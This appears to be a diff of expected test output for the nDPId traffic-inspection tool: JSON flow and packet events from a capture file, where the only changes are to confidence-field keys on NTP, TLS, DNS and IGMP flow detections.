00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1626168080092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080092,"pkt":"WNVuaKQA8BiYFWV8CABFAABMx3MAAEARqBTAqAF5Ef02+\/5LAHsAONKdIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
+00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1626168080122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080122,"pkt":"8BiYFWV8WNVuaKQACABFAABMV31AADcR4QoR\/Tb7wKgBeQB7\/ksAOLQqJAED6wAAAAAAAAANU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQLKsA6OSX2ZAsrLL1"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"} 
@@ -163,58 +163,58 @@ 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1626168080732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080732,"pkt":"WNVuaKQA8BiYFWV8CABFAABMaD0AAEARB0vAqAF5Ef02+94hAHsAOPLHIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
+00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1626168080762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080762,"pkt":"8BiYFWV8WNVuaKQACABFAABMWKVAADcR3+IR\/Tb7wKgBeQB73iEAOEmOJAED6wAAAAAAAAAOU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQ0KMdvOSX2ZDQo9j2"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} 
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} 